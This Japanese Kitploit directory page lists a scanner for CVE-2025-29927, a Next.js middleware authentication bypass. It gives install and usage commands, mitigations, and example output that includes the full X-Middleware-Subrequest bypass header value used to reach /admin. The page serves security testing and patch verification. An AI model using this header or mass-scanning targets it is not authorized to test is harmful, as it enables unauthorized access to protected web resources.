Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-29927 — Next.js ミドルウェアバイパススキャナー | Kitploit
ツール/GitHubGitHub/gotr00t0day/cve-2025-29927
偵察脆弱性スキャナーウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト
GitHubgotr00t0day/cve-2025-29927

CVE-2025-29927

Next.js ミドルウェアバイパススキャナー

リポジトリを見る
8111年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-29927

Next.js ミドルウェアバイパススキャナー (CVE-2025-29927)

CVE-2025-29927は、Next.jsバージョン11.1.4から15.2.2に影響するNext.jsミドルウェアバイパス脆弱性(CVE-2025-29927)を検出するための専門的なセキュリティツールです。この重大な脆弱性により、攻撃者は特別に細工されたHTTPヘッダーを送信することでセキュリティ制御をバイパスできます。

脆弱性について

Next.jsミドルウェアバイパス脆弱性(CVE-2025-29927)により、攻撃者はミドルウェア処理ロジックを混乱させる悪意のあるX-Middleware-Subrequestヘッダーを送信することで認証制御を回避できます。これにより、保護されたリソースやルートへの不正アクセスが可能になります。

CVSSスコア: 9.1 (Critical)

特徴

  • 複数ターゲットの高速同時スキャン
  • IPベーススキャン用のSSL証明書検証バイパスオプション
  • 自動化と出力の絞り込みのためのサイレントモード
  • 詳細な脆弱性情報(ステータスコード、バイパスヘッダー)
  • 包括的なテストのためのエンドポイント探索

インストール

root@kitploit:~
# Clone the repository
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927

# Install requirements
pip install -r requirements.txt

使用法

root@kitploit:~
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]

コマンドライン引数

  • -t, --target: スキャン対象の単一ターゲット(例: example.com または https://example.com)
  • -f, --file: ターゲットリストを含むファイル(1行に1つ)
  • -c, --concurrency: 同時スキャン数(デフォルト: 5)
  • -k, --insecure: SSL証明書検証を無効にする(IPアドレスに有用)
  • -s, --silent: サイレントモード - 脆弱なターゲットのみ表示

例

単一ターゲットのスキャン:

root@kitploit:~
python CVE-2025-29927.py -t example.com

ファイルから複数ターゲットをスキャン:

root@kitploit:~
python CVE-2025-29927.py -f targets.txt

SSL検証を無効にしてスキャン:

root@kitploit:~
python CVE-2025-29927.py -t 192.168.1.1 -k

サイレントモードでの自動スキャン:

root@kitploit:~
python CVE-2025-29927.py -f targets.txt -k -s

カスタムヘッダーでのスキャン:

root@kitploit:~
python3 CVE-2025-29927.py -t target -k -s -H "middleware"

出力

脆弱なターゲットに対して、MiddleWayは以下を表示します:

  • 脆弱なエンドポイント
  • 元のステータスコード
  • バイパス後のステータスコード
  • エクスプロイト成功に使用されたバイパスヘッダー

出力例:

root@kitploit:~
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
  Original status: 401
  Bypassed status: 200
  Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

緩和策

この脆弱性を緩和するには:

  1. Next.js 14.2.25、15.2.3以降にアップグレードする
  2. アップグレードが不可能な場合は、WAFまたはサーバーレベルでX-Middleware-Subrequestヘッダーをブロックする

免責事項

このツールは、セキュリティ研究および防御目的でのみ提供されています。所有していないシステムをスキャンする前に、必ず適切な許可を取得してください。作成者は、このツールの誤用について一切の責任を負いません。

ライセンス

MIT

ツールをダウンロード